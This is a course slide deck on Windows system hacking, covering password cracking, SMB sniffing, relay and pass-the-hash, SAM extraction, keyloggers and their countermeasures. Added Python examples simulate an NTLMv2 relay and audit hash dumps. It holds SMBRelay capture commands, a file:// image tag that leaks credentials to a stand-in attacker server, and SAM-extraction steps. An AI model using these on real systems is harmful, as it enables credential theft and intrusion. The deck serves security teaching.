This document covers system-hacking techniques: cracking passwords, escalating privileges, and covering tracks. It describes password-cracking methods (brute-force and dictionary attacks, sniffing credentials off the network), tools for cracking password hashes stored on Windows systems, and privilege escalation by exploiting vulnerabilities. It closes with recommendations for password security and for mitigating the risk of such attacks.
9. Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 9/83
Passive Online Attack: Man-in-the-Middle and Replay Attacks
Somehow get access to the communications channel
Wait for the authentication sequence
Proxy the authentication traffic
No need to brute force
Offline Attacks
Offline attacks are time consuming
LM hashes are much more vulnerable because of their smaller key space and shorter effective length (two independent 7-character, case-folded halves)
Online hash-lookup (web) services are available
Distributed password cracking techniques are available
Mitigations:
Use good passwords
Remove LM hashes
Assume the attacker has the password database: stored password representations must be cryptographically secure
Considerations:
Moore's law: cracking throughput keeps rising, so a margin that looks safe today erodes
Password Sniffing
Password guessing is a tough task
Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?
If an attacker is able to eavesdrop on NT/2000 logins, this approach spares a lot of random guesswork
How to Sniff SMB Credentials
Hacking Tool: NBTDeputy
NBTDeputy registers a NetBIOS computer name on the network and answers NetBT name-query requests for it.
NBTDeputy thus resolves a NetBIOS computer name to an IP address of the attacker's choosing; it is similar in spirit to proxy ARP.
This tool works well with SMBRelay.
For example, SMBRelay runs on a computer named ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTDeputy is run with 192.168.1.10 specified. SMBRelay can then connect to any XP or .NET server when logged-on users open "My Network Places".
Hacking Tool: SMBRelay
SMBRelay is essentially an SMB server that captures usernames and password hashes from incoming SMB traffic.
It can also perform man-in-the-middle (MITM) attacks.
On the attacker's host, NetBIOS over TCP/IP must be disabled and the Windows SMB service kept off ports 139 and 445, so that SMBRelay can bind those ports itself.
Start the SMBRelay server and listen for SMB packets:
c:\>smbrelay /e
c:\>smbrelay /IL 2 /IR 2
An attacker can then access the client machine by simply connecting to it via the relay address:
c:\>net use * \\<capture_ip>\c$
SMB Replay (Reflection) Attacks
Trick the client computer into requesting a connection to the attacker
Request a connection back to the client computer and collect its challenge
Return the client's own challenge to it as the attacker's challenge
Wait for the response from the client computer
Return that response as the attacker's own response
The best defense against SMB replay and relay is to require (not merely enable) SMB signing in security policy: a relayed session cannot be signed without the session key, which is derived from the user's secret and never crosses the wire
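The exchange the last two slides describe (relaying or reflecting a challenge and its response, and why SMB signing stops it), as an added Python simulation that is not part of the original deck. It implements MD4 itself because OpenSSL 3 builds often omit it; the user name, domain, password, challenge and client nonce are constructed for the example, and the signing step is a simplified model rather than the exact SMB1/SMB2 signature algorithm.

```python
"""Added simulation (not from the slides): NTLMv2 challenge/response, a relay that
passes authentication by forwarding challenge and response unchanged, and why the
relay still cannot sign the resulting session. All sample values are constructed."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(msg: bytes) -> bytes:
    """MD4 per RFC 1320: three rounds of 16 steps over each 64-byte block."""
    padded = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", 8 * len(msg))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), list(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(padded), 64):
        w = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = h
        for f, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rol((a + f(b, c, d) + w[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate register roles for the next step
        h = [(v + r) & MASK for v, r in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT ("Unicode") hash: unsalted MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP): HMAC-MD5 keyed with the NT hash over UPPER(user)+domain."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_response(ntowf: bytes, server_challenge: bytes, client_nonce: bytes):
    """Return (NTProofStr, temp). temp carries the client nonce; the timestamp and
    target-info fields are zero placeholders in this example."""
    temp = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + client_nonce + b"\x00" * 4 + b"\x00" * 4
    return hmac.new(ntowf, server_challenge + temp, hashlib.md5).digest(), temp


def session_key(ntowf: bytes, nt_proof: bytes) -> bytes:
    """SessionBaseKey = HMAC-MD5(NTOWFv2, NTProofStr): computable only with the secret."""
    return hmac.new(ntowf, nt_proof, hashlib.md5).digest()


def sign(key: bytes, msg: bytes) -> bytes:
    """Simplified signing model (real SMB signing differs in detail): HMAC-MD5, 8 bytes."""
    return hmac.new(key, msg, hashlib.md5).digest()[:8]


def simulate_relay(password="Summer2008!", user="alice", domain="CORP"):
    """Victim client <-> attacker <-> real server. Returns (auth_accepted, forged_signature_ok)."""
    # The server knows only the account's NT hash and issues a challenge (fixed here, random in practice).
    server_nt = nt_hash(password)
    server_challenge = bytes.fromhex("1122334455667788")
    # The attacker has lured the victim into authenticating to it (e.g. the file:// image trick)
    # and hands the victim the *server's* challenge instead of generating its own.
    client_ntowf = ntowf_v2(nt_hash(password), user, domain)
    nt_proof, temp = ntlmv2_response(client_ntowf, server_challenge, bytes.fromhex("aa" * 8))
    # The attacker forwards the victim's answer unchanged; the server checks it against its own challenge.
    expected = hmac.new(ntowf_v2(server_nt, user, domain), server_challenge + temp, hashlib.md5).digest()
    accepted = hmac.compare_digest(expected, nt_proof)
    # Signing: client and server derive the session key from NTOWFv2, which never crossed the wire.
    real_key = session_key(client_ntowf, nt_proof)
    msg = b"SMB2 TREE_CONNECT \\\\server\\C$"
    # The attacker saw only the challenge, NTProofStr and temp; any key built from those is wrong.
    attacker_key = hashlib.md5(server_challenge + nt_proof + temp).digest()
    forged_ok = hmac.compare_digest(sign(attacker_key, msg), sign(real_key, msg))
    return accepted, forged_ok


if __name__ == "__main__":
    ok, forged = simulate_relay()
    print("relayed authentication accepted:", ok)     # True: without signing the relay succeeds
    print("attacker can sign the session:", forged)   # False: required signing breaks the relay
```

The first result is the point of the SMBRelay slides: the attacker never learns the password or the hash, yet the server accepts the forwarded response. The second is the point of the signing countermeasure: once every SMB message must carry a signature keyed from the session key, the relayed session is useless to the attacker.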
Redirecting SMB Logon to the Attacker
Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication against a server of the attacker's choice.
The basic trick is to send the victim an email message containing an embedded hyperlink, or an image reference, that points to a fraudulent SMB server.
When the hyperlink is clicked, or the image is fetched, the user unwittingly sends his credentials over the network:
<img src="file://attacker_server/null.gif" height="1" width="1">
Replay Attack Tool: SMBProxy
A "passing the hash" tool that works as a proxy
You can authenticate to a Windows NT4/2000 server knowing only the NT hash (the MD4 hash of the password), without ever recovering the password itself
You can mount shares, access the registry, and do anything that particular user can do with his privileges
It does not work against SYSKEY-enabled systems
Tool: LCP
The main purpose of the LCP program is auditing and recovery of user account passwords in Windows NT/2000/XP/2003
Features:
Account information imports:
Import from local computer
Import from remote computer
Import from SAM file
Import from .LC file
Import from .LCS file
Import from PwDump file
Import from Sniff file
Passwords recovery:
Dictionary attack
Hybrid of dictionary and brute force attacks
Brute force attack
Tool: Access PassView
Access PassView reveals the database password of every password-protected .mdb file created with Microsoft Access 95/97/2000/XP
It is useful if you have forgotten an Access database password and want to recover it
There are two ways to obtain the password of an .mdb file:
Drag & Drop
Command line
Limitations:
For Access 2000/XP files, the utility cannot recover passwords longer than 18 characters
The utility shows only the main database password; it cannot recover user-level passwords
Password Recovery Tool: MS Access
Database Password Decoder
The ‘MS Access Database Password Decoder’ utility
was designed to decrypt the master password stored
in a Microsoft Access database
Tool: Asterisk Logger
Asterisk Logger reveals passwords that are hidden behind asterisks in password fields
Features:
Displays additional information about each revealed password, such as the date and time it was revealed, the name of the application that contains the password box, and the application's executable file
Allows you to save the passwords to an HTML file
Tool: Asterisk Key
Asterisk Key shows passwords hidden under asterisks
Features:
Uncovers hidden passwords on password dialog boxes
and web pages
State-of-the-art password recovery engine: All
passwords are recovered instantly
Supports multilingual passwords
Full install/uninstall support
Password Cracking Countermeasures
Enforce 8-12 character alphanumeric passwords (current guidance favors longer passphrases; length adds more entropy than extra character classes)
Set the password change policy to 30 days (note that forced periodic rotation is no longer recommended by NIST SP 800-63B unless compromise is suspected)
Physically isolate and protect the server
Use the SYSKEY utility to encrypt the hashes stored on disk
Monitor the server logs for brute-force attempts against user accounts
Do Not Store LAN Manager Hash in SAM Database
Instead of storing a user account password in cleartext, Windows stores two different "hashes" of the password
When you set or change a user account's password to one of fewer than 15 characters, Windows generates both the LAN Manager hash (LM hash) and the Windows NT hash (NT hash) of the password
These hashes are stored in the local Security Accounts Manager (SAM) database or in Active Directory
The LM hash is weak compared to the NT hash (it is case-folded and split into two independently crackable 7-character halves), so it is prone to fast brute-force attack
Therefore, you may want to prevent Windows from storing an LM hash of your password
LM Hash Backward Compatibility
Windows 2000-based and Windows Server 2003-based servers can authenticate users who connect from computers running earlier versions of Windows
Windows 95/98 clients do not use Kerberos for
authentication
For backward compatibility, Windows 2000 and
Windows Server 2003 support:
LAN Manager (LM) authentication
Windows NT (NTLM) authentication
NTLM version 2 (NTLMv2) authentication
LM Hash Backward Compatibility
NTLM, NTLMv2, and Kerberos all use the NT hash, also known as the Unicode hash
Only the LAN Manager authentication protocol uses the LM hash
It is best to prevent storage of the LM hash if you do not need it for backward compatibility. If your network contains Windows 95, Windows 98, or Macintosh clients, you may experience the following problems if you prevent the storage of LM hashes
How to Disable LM Hash
Enable the security policy "Network security: Do not store LAN Manager hash value on next password change" (the NoLMHash value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa). Note that existing LM hashes are only purged as each user next changes their password, so force a password change afterwards.
Cracking NT/2000 Passwords
The SAM file in Windows NT/2000 contains the user names and password hashes. It is located in the %systemroot%\system32\config directory
The file is locked while the OS is running
Booting to an alternate OS
NTFSDOS (www.sysinternals.com) will mount any NTFS partition as a logical drive
Backup SAM from the Repair directory
Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair
Expand this file using c:\>expand sam._ sam
Extract the hashes from the SAM
Use L0phtCrack to crack the hashes
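Once the hashes are extracted, the first thing to check is whether LM hashes are stored at all (see the "Do Not Store LAN Manager Hash" slide above). The following is an added Python example, not part of the deck, that audits pwdump-format output for stored LM hashes, LM hashes whose second half betrays a password of seven characters or fewer, blank NT hashes, and NT hashes shared between accounts (the NT hash is unsalted, so equal hashes mean equal passwords). The dump is constructed sample data: the hashes of "password" are the well-known values, the other hex strings are made up.

```python
"""Added example (not from the slides): audit a pwdump-style hash dump for the weak
storage conditions the deck warns about. SAMPLE_DUMP is constructed sample data."""
import re
from collections import defaultdict

# LM hash of the empty string; this is what pwdump shows when no LM hash is stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# Each LM half is DES of a constant under a 7-char key; a blank second half (the same
# 8 bytes as above) means the password was 7 characters or fewer.
EMPTY_LM_HALF = EMPTY_LM[:16]
# NT hash (MD4 of UTF-16LE) of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: "password" hashes are the well-known values, the rest are made up.
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:0182bd0bd4444bf8aad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
jdoe:1004:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

# pwdump record: user:rid:lmhash:nthash::: (trailing fields are empty in this format)
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):")


def parse_pwdump(text: str) -> list:
    """Parse pwdump lines into dicts; reject malformed lines instead of silently skipping."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not a pwdump record: {line!r}")
        e = m.groupdict()
        e["rid"] = int(e["rid"])
        e["lm"], e["nt"] = e["lm"].lower(), e["nt"].lower()
        entries.append(e)
    return entries


def audit(entries: list) -> dict:
    """Flag LM storage, short passwords visible through the LM format, blank passwords,
    and accounts that share an NT hash (same password)."""
    findings = {"lm_stored": [], "lm_short": [], "blank_password": [], "shared_nt": []}
    by_nt = defaultdict(list)
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings["lm_stored"].append(e["user"])
            if e["lm"][16:] == EMPTY_LM_HALF:
                findings["lm_short"].append(e["user"])
        if e["nt"] == EMPTY_NT:
            findings["blank_password"].append(e["user"])
        by_nt[e["nt"]].append(e["user"])
    findings["shared_nt"] = sorted(users for users in by_nt.values() if len(users) > 1)
    return findings


if __name__ == "__main__":
    for name, hits in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{name:15s} {hits}")
```

Any account listed under lm_stored is crackable as two independent 7-character, uppercase problems regardless of how strong the full password is, which is why the NoLMHash setting, followed by a forced password change, is the fix rather than a longer password.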
Privilege Escalation Tool: x.exe
When executed on a remote system, this tool creates a user called "X" with the password "X" and adds that user to the Administrators group
Tool: psexec
Lets you execute processes on other systems remotely
Launches interactive command prompts on remote systems
Emsa FlexInfo Pro
Emsa FlexInfo Pro is a system information and diagnostics tool that gives access to system details and settings
It includes a real-time CPU and memory graph, as well as CPU speed test and memory test tools
It includes several networking utilities (bandwidth monitor, ping, whois, etc.), an atomic time synchronizer, a browser popup blocker, and a basic keylogger
Keystroke Loggers
If all other attempts to obtain domain privileges fail, a keystroke logger is the fallback
Keystroke loggers are stealthy software (or hardware) components inserted between the keyboard and the applications that consume its input, so that they record every keystroke before the password is hashed or encrypted
There are two types of keystroke loggers:
Software-based
Hardware-based
Revealer Keylogger
Revealer Keylogger records keyboard input
Its log engine logs any language on any keyboard and correctly handles dead keys
Features:
Powerful log engine
Full invisible mode
Password protection
Send log files via e-mail
Hacking Tool: Hardware Key Logger
The Hardware Key Logger is a tiny hardware device attached in line between a keyboard and a computer.
It keeps a record of all keystrokes typed on the keyboard. The recording is completely transparent to the end user.
What is Spyware?
Spyware is a program that records computer activity on a machine:
Records keystrokes
Records email messages
Records IM chat sessions
Records websites visited
Records applications opened
Captures screenshots
Spyware: Spector
Spector is spyware that records everything a user does on the Internet
Spector automatically takes hundreds of snapshots every hour, like a surveillance camera
Spector works by taking a snapshot of whatever is on the computer screen and saving it in a hidden location on the system's hard drive
Keylogger Countermeasures
Install antivirus software and keep the signatures up to date
Install a host-based IDS such as the Cisco CSA agent, which can monitor the system and block the installation of keyloggers
Keep hardware systems in a locked environment
Frequently check the keyboard cables for attached connectors
Anti-Keylogger
This tool can detect keylogger installations and
remove them